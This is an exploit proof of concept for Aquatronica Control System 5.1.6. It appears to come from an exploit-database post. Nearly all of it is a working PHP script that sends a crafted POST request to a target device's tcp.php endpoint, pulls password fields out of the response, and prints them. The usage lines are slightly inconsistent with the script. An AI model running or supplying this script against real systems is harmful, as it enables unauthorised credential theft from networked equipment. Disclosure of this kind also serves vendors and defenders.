=============================================================================================================================================
| # Title     : Aquatronica Control System 5.1.6 Hash Disclosure Vulnerability                                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits)                                                            |
| # Vendor    : https://www.aquatronica.com                                                                                                 |
=============================================================================================================================================

poc :

[+] Leak passwords in Aquatronica Control System v 5.1.6 has a tcp.php endpoint  
   
[+] save as poc.php

[+] Usage : C:\www\test>php 3.php poc.php

[+] payload : 

<?php

// التأكد من توافر الوسائط المطلوبة
if ($argc != 2) {
    echo "Usage: php aqua.php\n";
    exit(1);
}

$ip = $argv[1];
$program = "TCP";
$command = "ws_get_network_cfg";
$function_id = "TCP_XML_REQUEST";


// إنشاء عنوان URL لنقطة النهاية tcp.php
$url = "http://$ip/" . strtolower($program) . ".php";

// البيانات التي سيتم إرسالها في الطلب POST
$post_data = [
    'function_id' => strtolower($function_id),
    'command' => strtoupper($command)
];

// إرسال الطلب باستخدام cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    // فك تشفير النصوص والإشارة المرجعية
    $decoded_response = urldecode($response);
    $final_response = htmlspecialchars_decode($decoded_response);

    // البحث عن كلمات المرور باستخدام التعبيرات النمطية
    preg_match_all('/pwd="([^"]+)"/', $final_response, $matches);

    if (!empty($matches[1])) {
        foreach ($matches[1] as $password) {
            echo " $password\n";
            sleep(1); // تأخير زمني بين الكلمات
        }
    } else {
        echo "No passwords found.\n";
    }
} else {
    echo "Dry season! HTTP Code: $http_code\n";
}
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================